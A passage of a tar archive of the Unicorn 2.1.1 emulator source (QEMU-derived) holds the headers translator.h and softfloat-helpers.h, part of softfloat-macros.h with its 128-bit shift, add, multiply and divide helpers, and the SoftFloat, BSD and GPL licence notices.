tb->cs_base == *cs_base && tb->flags == *flags && tb->trace_vcpu_dstate == *cpu->trace_dstate && (tb_cflags(tb) & (CF_HASH_MASK | CF_INVALID)) == cf_mask)) { return tb; } tb = tb_htable_lookup(cpu, *pc, *cs_base, *flags, cf_mask); if (tb == NULL) { return NULL; } cpu->tb_jmp_cache[hash] = tb; return tb; } #endif /* EXEC_TB_LOOKUP_H */ ��������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/translator.h��������������������������������������������������������0000664�0000000�0000000�00000014544�14675241067�0021074�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Generic intermediate code generation. * * Copyright (C) 2016-2017 Lluís Vilanova <vilanova@ac.upc.edu> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef EXEC__TRANSLATOR_H #define EXEC__TRANSLATOR_H /* * Include this header from a target-specific file, and add a * * DisasContextBase base; * * member in your target-specific DisasContext. */ #include "qemu/bswap.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "tcg/tcg.h" /** * DisasJumpType: * @DISAS_NEXT: Next instruction in program order. * @DISAS_TOO_MANY: Too many instructions translated. * @DISAS_NORETURN: Following code is dead. * @DISAS_TARGET_*: Start of target-specific conditions. * * What instruction to disassemble next. */ typedef enum DisasJumpType { DISAS_NEXT, DISAS_TOO_MANY, DISAS_NORETURN, DISAS_TARGET_0, DISAS_TARGET_1, DISAS_TARGET_2, DISAS_TARGET_3, DISAS_TARGET_4, DISAS_TARGET_5, DISAS_TARGET_6, DISAS_TARGET_7, DISAS_TARGET_8, DISAS_TARGET_9, DISAS_TARGET_10, DISAS_TARGET_11, } DisasJumpType; /** * DisasContextBase: * @tb: Translation block for this disassembly. * @pc_first: Address of first guest instruction in this TB. * @pc_next: Address of next guest instruction in this TB (current during * disassembly). * @is_jmp: What instruction to disassemble next. * @num_insns: Number of translated instructions (including current). * @max_insns: Maximum number of instructions to be translated in this TB. * @singlestep_enabled: "Hardware" single stepping enabled. * * Architecture-agnostic disassembly context. */ typedef struct DisasContextBase { TranslationBlock *tb; target_ulong pc_first; target_ulong pc_next; DisasJumpType is_jmp; int num_insns; int max_insns; bool singlestep_enabled; } DisasContextBase; /** * TranslatorOps: * @init_disas_context: * Initialize the target-specific portions of DisasContext struct. * The generic DisasContextBase has already been initialized. * * @tb_start: * Emit any code required before the start of the main loop, * after the generic gen_tb_start(). * * @insn_start: * Emit the tcg_gen_insn_start opcode. * * @breakpoint_check: * When called, the breakpoint has already been checked to match the PC, * but the target may decide the breakpoint missed the address * (e.g., due to conditions encoded in their flags). Return true to * indicate that the breakpoint did hit, in which case no more breakpoints * are checked. If the breakpoint did hit, emit any code required to * signal the exception, and set db->is_jmp as necessary to terminate * the main loop. * * @translate_insn: * Disassemble one instruction and set db->pc_next for the start * of the following instruction. Set db->is_jmp as necessary to * terminate the main loop. * * @tb_stop: * Emit any opcodes required to exit the TB, based on db->is_jmp. */ typedef struct TranslatorOps { void (*init_disas_context)(DisasContextBase *db, CPUState *cpu); void (*tb_start)(DisasContextBase *db, CPUState *cpu); void (*insn_start)(DisasContextBase *db, CPUState *cpu); bool (*breakpoint_check)(DisasContextBase *db, CPUState *cpu, const CPUBreakpoint *bp); void (*translate_insn)(DisasContextBase *db, CPUState *cpu); void (*tb_stop)(DisasContextBase *db, CPUState *cpu); } TranslatorOps; /** * translator_loop: * @ops: Target-specific operations. * @db: Disassembly context. * @cpu: Target vCPU. * @tb: Translation block. * @max_insns: Maximum number of insns to translate. * * Generic translator loop. * * Translation will stop in the following cases (in order): * - When is_jmp set by #TranslatorOps::breakpoint_check. * - set to DISAS_TOO_MANY exits after translating one more insn * - set to any other value than DISAS_NEXT exits immediately. * - When is_jmp set by #TranslatorOps::translate_insn. * - set to any value other than DISAS_NEXT exits immediately. * - When the TCG operation buffer is full. * - When single-stepping is enabled (system-wide or on the current vCPU). * - When too many instructions have been translated. */ void translator_loop(const TranslatorOps *ops, DisasContextBase *db, CPUState *cpu, TranslationBlock *tb, int max_insns); void translator_loop_temp_check(DisasContextBase *db); /* * Translator Load Functions * * These are intended to replace the direct usage of the cpu_ld*_code * functions and are mandatory for front-ends that have been migrated * to the common translator_loop. These functions are only intended * to be called from the translation stage and should not be called * from helper functions. Those functions should be converted to encode * the relevant information at translation time. */ #define GEN_TRANSLATOR_LD(fullname, type, load_fn, swap_fn) \ static inline type \ fullname ## _swap(TCGContext *tcg_ctx, CPUArchState *env, abi_ptr pc, bool do_swap) \ { \ type ret = load_fn(env, pc); \ if (do_swap) { \ ret = swap_fn(ret); \ } \ return ret; \ } \ \ static inline type fullname(TCGContext *tcg_ctx, CPUArchState *env, abi_ptr pc) \ { \ return fullname ## _swap(tcg_ctx, env, pc, false); \ } GEN_TRANSLATOR_LD(translator_ldub, uint8_t, cpu_ldub_code, /* no swap */) GEN_TRANSLATOR_LD(translator_ldsw, int16_t, cpu_ldsw_code, bswap16) GEN_TRANSLATOR_LD(translator_lduw, uint16_t, cpu_lduw_code, bswap16) GEN_TRANSLATOR_LD(translator_ldl, uint32_t, cpu_ldl_code, bswap32) GEN_TRANSLATOR_LD(translator_ldq, uint64_t, cpu_ldq_code, bswap64) #undef GEN_TRANSLATOR_LD #endif /* EXEC__TRANSLATOR_H */ ������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/fpu/���������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016370�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/fpu/softfloat-helpers.h��������������������������������������������������0000664�0000000�0000000�00000010242�14675241067�0022201�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU float support - standalone helpers * * This is provided for files that don't need the access to the full * set of softfloat functions. Typically this is cpu initialisation * code which wants to set default rounding and exceptions modes. * * The code in this source file is derived from release 2a of the SoftFloat * IEC/IEEE Floating-point Arithmetic Package. Those parts of the code (and * some later contributions) are provided under that license, as detailed below. * It has subsequently been modified by contributors to the QEMU Project, * so some portions are provided under: * the SoftFloat-2a license * the BSD license * GPL-v2-or-later * * Any future contributions to this file after December 1st 2014 will be * taken to be licensed under the Softfloat-2a license unless specifically * indicated otherwise. */ /* =============================================================================== This C header file is part of the SoftFloat IEC/IEEE Floating-point Arithmetic Package, Release 2a. Written by John R. Hauser. This work was made possible in part by the International Computer Science Institute, located at Suite 600, 1947 Center Street, Berkeley, California 94704. Funding was partially provided by the National Science Foundation under grant MIP-9311980. The original version of this code was written as part of a project to build a fixed-point vector processor in collaboration with the University of California at Berkeley, overseen by Profs. Nelson Morgan and John Wawrzynek. More information is available through the Web page `http://HTTP.CS.Berkeley.EDU/~jhauser/ arithmetic/SoftFloat.html'. THIS SOFTWARE IS DISTRIBUTED AS IS, FOR FREE. Although reasonable effort has been made to avoid it, THIS SOFTWARE MAY CONTAIN FAULTS THAT WILL AT TIMES RESULT IN INCORRECT BEHAVIOR. USE OF THIS SOFTWARE IS RESTRICTED TO PERSONS AND ORGANIZATIONS WHO CAN AND WILL TAKE FULL RESPONSIBILITY FOR ANY AND ALL LOSSES, COSTS, OR OTHER PROBLEMS ARISING FROM ITS USE. Derivative works are acceptable, even for commercial purposes, so long as (1) they include prominent notice that the work is derivative, and (2) they include prominent notice akin to these four paragraphs for those parts of this code that are retained. =============================================================================== */ #ifndef _SOFTFLOAT_HELPERS_H_ #define _SOFTFLOAT_HELPERS_H_ #include "fpu/softfloat-types.h" static inline void set_float_detect_tininess(int val, float_status *status) { status->float_detect_tininess = val; } static inline void set_float_rounding_mode(int val, float_status *status) { status->float_rounding_mode = val; } static inline void set_float_exception_flags(int val, float_status *status) { status->float_exception_flags = val; } static inline void set_floatx80_rounding_precision(int val, float_status *status) { status->floatx80_rounding_precision = val; } static inline void set_flush_to_zero(flag val, float_status *status) { status->flush_to_zero = val; } static inline void set_flush_inputs_to_zero(flag val, float_status *status) { status->flush_inputs_to_zero = val; } static inline void set_default_nan_mode(flag val, float_status *status) { status->default_nan_mode = val; } static inline void set_snan_bit_is_one(flag val, float_status *status) { status->snan_bit_is_one = val; } static inline int get_float_detect_tininess(float_status *status) { return status->float_detect_tininess; } static inline int get_float_rounding_mode(float_status *status) { return status->float_rounding_mode; } static inline int get_float_exception_flags(float_status *status) { return status->float_exception_flags; } static inline int get_floatx80_rounding_precision(float_status *status) { return status->floatx80_rounding_precision; } static inline flag get_flush_to_zero(float_status *status) { return status->flush_to_zero; } static inline flag get_flush_inputs_to_zero(float_status *status) { return status->flush_inputs_to_zero; } static inline flag get_default_nan_mode(float_status *status) { return status->default_nan_mode; } #endif /* _SOFTFLOAT_HELPERS_H_ */ ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/fpu/softfloat-macros.h���������������������������������������������������0000664�0000000�0000000�00000065751�14675241067�0022042�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU float support macros * * The code in this source file is derived from release 2a of the SoftFloat * IEC/IEEE Floating-point Arithmetic Package. Those parts of the code (and * some later contributions) are provided under that license, as detailed below. * It has subsequently been modified by contributors to the QEMU Project, * so some portions are provided under: * the SoftFloat-2a license * the BSD license * GPL-v2-or-later * * Any future contributions to this file after December 1st 2014 will be * taken to be licensed under the Softfloat-2a license unless specifically * indicated otherwise. */ /* =============================================================================== This C source fragment is part of the SoftFloat IEC/IEEE Floating-point Arithmetic Package, Release 2a. Written by John R. Hauser. This work was made possible in part by the International Computer Science Institute, located at Suite 600, 1947 Center Street, Berkeley, California 94704. Funding was partially provided by the National Science Foundation under grant MIP-9311980. The original version of this code was written as part of a project to build a fixed-point vector processor in collaboration with the University of California at Berkeley, overseen by Profs. Nelson Morgan and John Wawrzynek. More information is available through the Web page `http://HTTP.CS.Berkeley.EDU/~jhauser/ arithmetic/SoftFloat.html'. THIS SOFTWARE IS DISTRIBUTED AS IS, FOR FREE. Although reasonable effort has been made to avoid it, THIS SOFTWARE MAY CONTAIN FAULTS THAT WILL AT TIMES RESULT IN INCORRECT BEHAVIOR. USE OF THIS SOFTWARE IS RESTRICTED TO PERSONS AND ORGANIZATIONS WHO CAN AND WILL TAKE FULL RESPONSIBILITY FOR ANY AND ALL LOSSES, COSTS, OR OTHER PROBLEMS ARISING FROM ITS USE. Derivative works are acceptable, even for commercial purposes, so long as (1) they include prominent notice that the work is derivative, and (2) they include prominent notice akin to these four paragraphs for those parts of this code that are retained. =============================================================================== */ /* BSD licensing: * Copyright (c) 2006, Fabrice Bellard * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * 3. Neither the name of the copyright holder nor the names of its contributors * may be used to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGE. */ /* Portions of this work are licensed under the terms of the GNU GPL, * version 2 or later. See the COPYING file in the top-level directory. */ #ifndef FPU_SOFTFLOAT_MACROS_H #define FPU_SOFTFLOAT_MACROS_H #include "fpu/softfloat-types.h" /*---------------------------------------------------------------------------- | Shifts `a' right by the number of bits given in `count'. If any nonzero | bits are shifted off, they are ``jammed'' into the least significant bit of | the result by setting the least significant bit to 1. The value of `count' | can be arbitrarily large; in particular, if `count' is greater than 32, the | result will be either 0 or 1, depending on whether `a' is zero or nonzero. | The result is stored in the location pointed to by `zPtr'. *----------------------------------------------------------------------------*/ static inline void shift32RightJamming(uint32_t a, int count, uint32_t *zPtr) { uint32_t z; if ( count == 0 ) { z = a; } else if ( count < 32 ) { z = ( a>>count ) | ( ( a<<( ( - count ) & 31 ) ) != 0 ); } else { z = ( a != 0 ); } *zPtr = z; } /*---------------------------------------------------------------------------- | Shifts `a' right by the number of bits given in `count'. If any nonzero | bits are shifted off, they are ``jammed'' into the least significant bit of | the result by setting the least significant bit to 1. The value of `count' | can be arbitrarily large; in particular, if `count' is greater than 64, the | result will be either 0 or 1, depending on whether `a' is zero or nonzero. | The result is stored in the location pointed to by `zPtr'. *----------------------------------------------------------------------------*/ static inline void shift64RightJamming(uint64_t a, int count, uint64_t *zPtr) { uint64_t z; if ( count == 0 ) { z = a; } else if ( count < 64 ) { z = ( a>>count ) | ( ( a<<( ( - count ) & 63 ) ) != 0 ); } else { z = ( a != 0 ); } *zPtr = z; } /*---------------------------------------------------------------------------- | Shifts the 128-bit value formed by concatenating `a0' and `a1' right by 64 | _plus_ the number of bits given in `count'. The shifted result is at most | 64 nonzero bits; this is stored at the location pointed to by `z0Ptr'. The | bits shifted off form a second 64-bit result as follows: The _last_ bit | shifted off is the most-significant bit of the extra result, and the other | 63 bits of the extra result are all zero if and only if _all_but_the_last_ | bits shifted off were all zero. This extra result is stored in the location | pointed to by `z1Ptr'. The value of `count' can be arbitrarily large. | (This routine makes more sense if `a0' and `a1' are considered to form a | fixed-point value with binary point between `a0' and `a1'. This fixed-point | value is shifted right by the number of bits given in `count', and the | integer part of the result is returned at the location pointed to by | `z0Ptr'. The fractional part of the result may be slightly corrupted as | described above, and is returned at the location pointed to by `z1Ptr'.) *----------------------------------------------------------------------------*/ static inline void shift64ExtraRightJamming( uint64_t a0, uint64_t a1, int count, uint64_t *z0Ptr, uint64_t *z1Ptr) { uint64_t z0, z1; int8_t negCount = ( - count ) & 63; if ( count == 0 ) { z1 = a1; z0 = a0; } else if ( count < 64 ) { z1 = ( a0<<negCount ) | ( a1 != 0 ); z0 = a0>>count; } else { if ( count == 64 ) { z1 = a0 | ( a1 != 0 ); } else { z1 = ( ( a0 | a1 ) != 0 ); } z0 = 0; } *z1Ptr = z1; *z0Ptr = z0; } /*---------------------------------------------------------------------------- | Shifts the 128-bit value formed by concatenating `a0' and `a1' right by the | number of bits given in `count'. Any bits shifted off are lost. The value | of `count' can be arbitrarily large; in particular, if `count' is greater | than 128, the result will be 0. The result is broken into two 64-bit pieces | which are stored at the locations pointed to by `z0Ptr' and `z1Ptr'. *----------------------------------------------------------------------------*/ static inline void shift128Right( uint64_t a0, uint64_t a1, int count, uint64_t *z0Ptr, uint64_t *z1Ptr) { uint64_t z0, z1; int8_t negCount = ( - count ) & 63; if ( count == 0 ) { z1 = a1; z0 = a0; } else if ( count < 64 ) { z1 = ( a0<<negCount ) | ( a1>>count ); z0 = a0>>count; } else { z1 = (count < 128) ? (a0 >> (count & 63)) : 0; z0 = 0; } *z1Ptr = z1; *z0Ptr = z0; } /*---------------------------------------------------------------------------- | Shifts the 128-bit value formed by concatenating `a0' and `a1' right by the | number of bits given in `count'. If any nonzero bits are shifted off, they | are ``jammed'' into the least significant bit of the result by setting the | least significant bit to 1. The value of `count' can be arbitrarily large; | in particular, if `count' is greater than 128, the result will be either | 0 or 1, depending on whether the concatenation of `a0' and `a1' is zero or | nonzero. The result is broken into two 64-bit pieces which are stored at | the locations pointed to by `z0Ptr' and `z1Ptr'. *----------------------------------------------------------------------------*/ static inline void shift128RightJamming( uint64_t a0, uint64_t a1, int count, uint64_t *z0Ptr, uint64_t *z1Ptr) { uint64_t z0, z1; int8_t negCount = ( - count ) & 63; if ( count == 0 ) { z1 = a1; z0 = a0; } else if ( count < 64 ) { z1 = ( a0<<negCount ) | ( a1>>count ) | ( ( a1<<negCount ) != 0 ); z0 = a0>>count; } else { if ( count == 64 ) { z1 = a0 | ( a1 != 0 ); } else if ( count < 128 ) { z1 = ( a0>>( count & 63 ) ) | ( ( ( a0<<negCount ) | a1 ) != 0 ); } else { z1 = ( ( a0 | a1 ) != 0 ); } z0 = 0; } *z1Ptr = z1; *z0Ptr = z0; } /*---------------------------------------------------------------------------- | Shifts the 192-bit value formed by concatenating `a0', `a1', and `a2' right | by 64 _plus_ the number of bits given in `count'. The shifted result is | at most 128 nonzero bits; these are broken into two 64-bit pieces which are | stored at the locations pointed to by `z0Ptr' and `z1Ptr'. The bits shifted | off form a third 64-bit result as follows: The _last_ bit shifted off is | the most-significant bit of the extra result, and the other 63 bits of the | extra result are all zero if and only if _all_but_the_last_ bits shifted off | were all zero. This extra result is stored in the location pointed to by | `z2Ptr'. The value of `count' can be arbitrarily large. | (This routine makes more sense if `a0', `a1', and `a2' are considered | to form a fixed-point value with binary point between `a1' and `a2'. This | fixed-point value is shifted right by the number of bits given in `count', | and the integer part of the result is returned at the locations pointed to | by `z0Ptr' and `z1Ptr'. The fractional part of the result may be slightly | corrupted as described above, and is returned at the location pointed to by | `z2Ptr'.) *----------------------------------------------------------------------------*/ static inline void shift128ExtraRightJamming( uint64_t a0, uint64_t a1, uint64_t a2, int count, uint64_t *z0Ptr, uint64_t *z1Ptr, uint64_t *z2Ptr ) { uint64_t z0, z1, z2; int8_t negCount = ( - count ) & 63; if ( count == 0 ) { z2 = a2; z1 = a1; z0 = a0; } else { if ( count < 64 ) { z2 = a1<<negCount; z1 = ( a0<<negCount ) | ( a1>>count ); z0 = a0>>count; } else { if ( count == 64 ) { z2 = a1; z1 = a0; } else { a2 |= a1; if ( count < 128 ) { z2 = a0<<negCount; z1 = a0>>( count & 63 ); } else { z2 = ( count == 128 ) ? a0 : ( a0 != 0 ); z1 = 0; } } z0 = 0; } z2 |= ( a2 != 0 ); } *z2Ptr = z2; *z1Ptr = z1; *z0Ptr = z0; } /*---------------------------------------------------------------------------- | Shifts the 128-bit value formed by concatenating `a0' and `a1' left by the | number of bits given in `count'. Any bits shifted off are lost. The value | of `count' must be less than 64. The result is broken into two 64-bit | pieces which are stored at the locations pointed to by `z0Ptr' and `z1Ptr'. *----------------------------------------------------------------------------*/ static inline void shortShift128Left(uint64_t a0, uint64_t a1, int count, uint64_t *z0Ptr, uint64_t *z1Ptr) { *z1Ptr = a1 << count; *z0Ptr = count == 0 ? a0 : (a0 << count) | (a1 >> (-count & 63)); } /*---------------------------------------------------------------------------- | Shifts the 128-bit value formed by concatenating `a0' and `a1' left by the | number of bits given in `count'. Any bits shifted off are lost. The value | of `count' may be greater than 64. The result is broken into two 64-bit | pieces which are stored at the locations pointed to by `z0Ptr' and `z1Ptr'. *----------------------------------------------------------------------------*/ static inline void shift128Left(uint64_t a0, uint64_t a1, int count, uint64_t *z0Ptr, uint64_t *z1Ptr) { if (count < 64) { *z1Ptr = a1 << count; *z0Ptr = count == 0 ? a0 : (a0 << count) | (a1 >> (-count & 63)); } else { *z1Ptr = 0; *z0Ptr = a1 << (count - 64); } } /*---------------------------------------------------------------------------- | Shifts the 192-bit value formed by concatenating `a0', `a1', and `a2' left | by the number of bits given in `count'. Any bits shifted off are lost. | The value of `count' must be less than 64. The result is broken into three | 64-bit pieces which are stored at the locations pointed to by `z0Ptr', | `z1Ptr', and `z2Ptr'. *----------------------------------------------------------------------------*/ static inline void shortShift192Left( uint64_t a0, uint64_t a1, uint64_t a2, int count, uint64_t *z0Ptr, uint64_t *z1Ptr, uint64_t *z2Ptr ) { uint64_t z0, z1, z2; int8_t negCount; z2 = a2<<count; z1 = a1<<count; z0 = a0<<count; if ( 0 < count ) { negCount = ( ( - count ) & 63 ); z1 |= a2>>negCount; z0 |= a1>>negCount; } *z2Ptr = z2; *z1Ptr = z1; *z0Ptr = z0; } /*---------------------------------------------------------------------------- | Adds the 128-bit value formed by concatenating `a0' and `a1' to the 128-bit | value formed by concatenating `b0' and `b1'. Addition is modulo 2^128, so | any carry out is lost. The result is broken into two 64-bit pieces which | are stored at the locations pointed to by `z0Ptr' and `z1Ptr'. *----------------------------------------------------------------------------*/ static inline void add128( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1, uint64_t *z0Ptr, uint64_t *z1Ptr ) { uint64_t z1; z1 = a1 + b1; *z1Ptr = z1; *z0Ptr = a0 + b0 + ( z1 < a1 ); } /*---------------------------------------------------------------------------- | Adds the 192-bit value formed by concatenating `a0', `a1', and `a2' to the | 192-bit value formed by concatenating `b0', `b1', and `b2'. Addition is | modulo 2^192, so any carry out is lost. The result is broken into three | 64-bit pieces which are stored at the locations pointed to by `z0Ptr', | `z1Ptr', and `z2Ptr'. *----------------------------------------------------------------------------*/ static inline void add192( uint64_t a0, uint64_t a1, uint64_t a2, uint64_t b0, uint64_t b1, uint64_t b2, uint64_t *z0Ptr, uint64_t *z1Ptr, uint64_t *z2Ptr ) { uint64_t z0, z1, z2; int8_t carry0, carry1; z2 = a2 + b2; carry1 = ( z2 < a2 ); z1 = a1 + b1; carry0 = ( z1 < a1 ); z0 = a0 + b0; z1 += carry1; z0 += ( z1 < carry1 ); z0 += carry0; *z2Ptr = z2; *z1Ptr = z1; *z0Ptr = z0; } /*---------------------------------------------------------------------------- | Subtracts the 128-bit value formed by concatenating `b0' and `b1' from the | 128-bit value formed by concatenating `a0' and `a1'. Subtraction is modulo | 2^128, so any borrow out (carry out) is lost. The result is broken into two | 64-bit pieces which are stored at the locations pointed to by `z0Ptr' and | `z1Ptr'. *----------------------------------------------------------------------------*/ static inline void sub128( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1, uint64_t *z0Ptr, uint64_t *z1Ptr ) { *z1Ptr = a1 - b1; *z0Ptr = a0 - b0 - ( a1 < b1 ); } /*---------------------------------------------------------------------------- | Subtracts the 192-bit value formed by concatenating `b0', `b1', and `b2' | from the 192-bit value formed by concatenating `a0', `a1', and `a2'. | Subtraction is modulo 2^192, so any borrow out (carry out) is lost. The | result is broken into three 64-bit pieces which are stored at the locations | pointed to by `z0Ptr', `z1Ptr', and `z2Ptr'. *----------------------------------------------------------------------------*/ static inline void sub192( uint64_t a0, uint64_t a1, uint64_t a2, uint64_t b0, uint64_t b1, uint64_t b2, uint64_t *z0Ptr, uint64_t *z1Ptr, uint64_t *z2Ptr ) { uint64_t z0, z1, z2; int8_t borrow0, borrow1; z2 = a2 - b2; borrow1 = ( a2 < b2 ); z1 = a1 - b1; borrow0 = ( a1 < b1 ); z0 = a0 - b0; z0 -= ( z1 < borrow1 ); z1 -= borrow1; z0 -= borrow0; *z2Ptr = z2; *z1Ptr = z1; *z0Ptr = z0; } /*---------------------------------------------------------------------------- | Multiplies `a' by `b' to obtain a 128-bit product. The product is broken | into two 64-bit pieces which are stored at the locations pointed to by | `z0Ptr' and `z1Ptr'. *----------------------------------------------------------------------------*/ static inline void mul64To128( uint64_t a, uint64_t b, uint64_t *z0Ptr, uint64_t *z1Ptr ) { uint32_t aHigh, aLow, bHigh, bLow; uint64_t z0, zMiddleA, zMiddleB, z1; aLow = a; aHigh = a>>32; bLow = b; bHigh = b>>32; z1 = ( (uint64_t) aLow ) * bLow; zMiddleA = ( (uint64_t) aLow ) * bHigh; zMiddleB = ( (uint64_t) aHigh ) * bLow; z0 = ( (uint64_t) aHigh ) * bHigh; zMiddleA += zMiddleB; z0 += ( ( (uint64_t) ( zMiddleA < zMiddleB ) )<<32 ) + ( zMiddleA>>32 ); zMiddleA <<= 32; z1 += zMiddleA; z0 += ( z1 < zMiddleA ); *z1Ptr = z1; *z0Ptr = z0; } /*---------------------------------------------------------------------------- | Multiplies the 128-bit value formed by concatenating `a0' and `a1' by | `b' to obtain a 192-bit product. The product is broken into three 64-bit | pieces which are stored at the locations pointed to by `z0Ptr', `z1Ptr', and | `z2Ptr'. *----------------------------------------------------------------------------*/ static inline void mul128By64To192( uint64_t a0, uint64_t a1, uint64_t b, uint64_t *z0Ptr, uint64_t *z1Ptr, uint64_t *z2Ptr ) { uint64_t z0, z1, z2, more1; mul64To128( a1, b, &z1, &z2 ); mul64To128( a0, b, &z0, &more1 ); add128( z0, more1, 0, z1, &z0, &z1 ); *z2Ptr = z2; *z1Ptr = z1; *z0Ptr = z0; } /*---------------------------------------------------------------------------- | Multiplies the 128-bit value formed by concatenating `a0' and `a1' to the | 128-bit value formed by concatenating `b0' and `b1' to obtain a 256-bit | product. The product is broken into four 64-bit pieces which are stored at | the locations pointed to by `z0Ptr', `z1Ptr', `z2Ptr', and `z3Ptr'. *----------------------------------------------------------------------------*/ static inline void mul128To256( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1, uint64_t *z0Ptr, uint64_t *z1Ptr, uint64_t *z2Ptr, uint64_t *z3Ptr ) { uint64_t z0, z1, z2, z3; uint64_t more1, more2; mul64To128( a1, b1, &z2, &z3 ); mul64To128( a1, b0, &z1, &more2 ); add128( z1, more2, 0, z2, &z1, &z2 ); mul64To128( a0, b0, &z0, &more1 ); add128( z0, more1, 0, z1, &z0, &z1 ); mul64To128( a0, b1, &more1, &more2 ); add128( more1, more2, 0, z2, &more1, &z2 ); add128( z0, z1, 0, more1, &z0, &z1 ); *z3Ptr = z3; *z2Ptr = z2; *z1Ptr = z1; *z0Ptr = z0; } /*---------------------------------------------------------------------------- | Returns an approximation to the 64-bit integer quotient obtained by dividing | `b' into the 128-bit value formed by concatenating `a0' and `a1'. The | divisor `b' must be at least 2^63. If q is the exact quotient truncated | toward zero, the approximation returned lies between q and q + 2 inclusive. | If the exact quotient q is larger than 64 bits, the maximum positive 64-bit | unsigned integer is returned. *----------------------------------------------------------------------------*/ static inline uint64_t estimateDiv128To64(uint64_t a0, uint64_t a1, uint64_t b) { uint64_t b0, b1; uint64_t rem0, rem1, term0, term1; uint64_t z; if ( b <= a0 ) return UINT64_C(0xFFFFFFFFFFFFFFFF); b0 = b>>32; z = ( b0<<32 <= a0 ) ? UINT64_C(0xFFFFFFFF00000000) : ( a0 / b0 )<<32; mul64To128( b, z, &term0, &term1 ); sub128( a0, a1, term0, term1, &rem0, &rem1 ); while ( ( (int64_t) rem0 ) < 0 ) { z -= UINT64_C(0x100000000); b1 = b<<32; add128( rem0, rem1, b0, b1, &rem0, &rem1 ); } rem0 = ( rem0<<32 ) | ( rem1>>32 ); z |= ( b0<<32 <= rem0 ) ? 0xFFFFFFFF : rem0 / b0; return z; } /* From the GNU Multi Precision Library - longlong.h __udiv_qrnnd * (https://gmplib.org/repo/gmp/file/tip/longlong.h) * * Licensed under the GPLv2/LGPLv3 */ static inline uint64_t udiv_qrnnd(uint64_t *r, uint64_t n1, uint64_t n0, uint64_t d) { #if defined(__x86_64__) && !defined(_MSC_VER) uint64_t q; asm ("divq %4" : "=a"(q), "=d"(*r) : "0"(n0), "1"(n1), "rm"(d)); return q; #elif defined(__s390x__) && !defined(__clang__) /* Need to use a TImode type to get an even register pair for DLGR. */ unsigned __int128 n = (unsigned __int128)n1 << 64 | n0; asm("dlgr %0, %1" : "+r"(n) : "r"(d)); *r = n >> 64; return n; #elif defined(_ARCH_PPC64) && defined(_ARCH_PWR7) /* From Power ISA 2.06, programming note for divdeu. */ uint64_t q1, q2, Q, r1, r2, R; asm("divdeu %0,%2,%4; divdu %1,%3,%4" : "=&r"(q1), "=r"(q2) : "r"(n1), "r"(n0), "r"(d)); r1 = -(q1 * d); /* low part of (n1<<64) - (q1 * d) */ r2 = n0 - (q2 * d); Q = q1 + q2; R = r1 + r2; if (R >= d || R < r2) { /* overflow implies R > d */ Q += 1; R -= d; } *r = R; return Q; #else uint64_t d0, d1, q0, q1, r1, r0, m; d0 = (uint32_t)d; d1 = d >> 32; r1 = n1 % d1; q1 = n1 / d1; m = q1 * d0; r1 = (r1 << 32) | (n0 >> 32); if (r1 < m) { q1 -= 1; r1 += d; if (r1 >= d) { if (r1 < m) { q1 -= 1; r1 += d; } } } r1 -= m; r0 = r1 % d1; q0 = r1 / d1; m = q0 * d0; r0 = (r0 << 32) | (uint32_t)n0; if (r0 < m) { q0 -= 1; r0 += d; if (r0 >= d) { if (r0 < m) { q0 -= 1; r0 += d; } } } r0 -= m; *r = r0; return (q1 << 32) | q0; #endif } /*---------------------------------------------------------------------------- | Returns an approximation to the square root of the 32-bit significand given | by `a'. Considered as an integer, `a' must be at least 2^31. If bit 0 of | `aExp' (the least significant bit) is 1, the integer returned approximates | 2^31*sqrt(`a'/2^31), where `a' is considered an integer. If bit 0 of `aExp' | is 0, the integer returned approximates 2^31*sqrt(`a'/2^30). In either | case, the approximation returned lies strictly within +/-2 of the exact | value. *----------------------------------------------------------------------------*/ static inline uint32_t estimateSqrt32(int aExp, uint32_t a) { static const uint16_t sqrtOddAdjustments[] = { 0x0004, 0x0022, 0x005D, 0x00B1, 0x011D, 0x019F, 0x0236, 0x02E0, 0x039C, 0x0468, 0x0545, 0x0631, 0x072B, 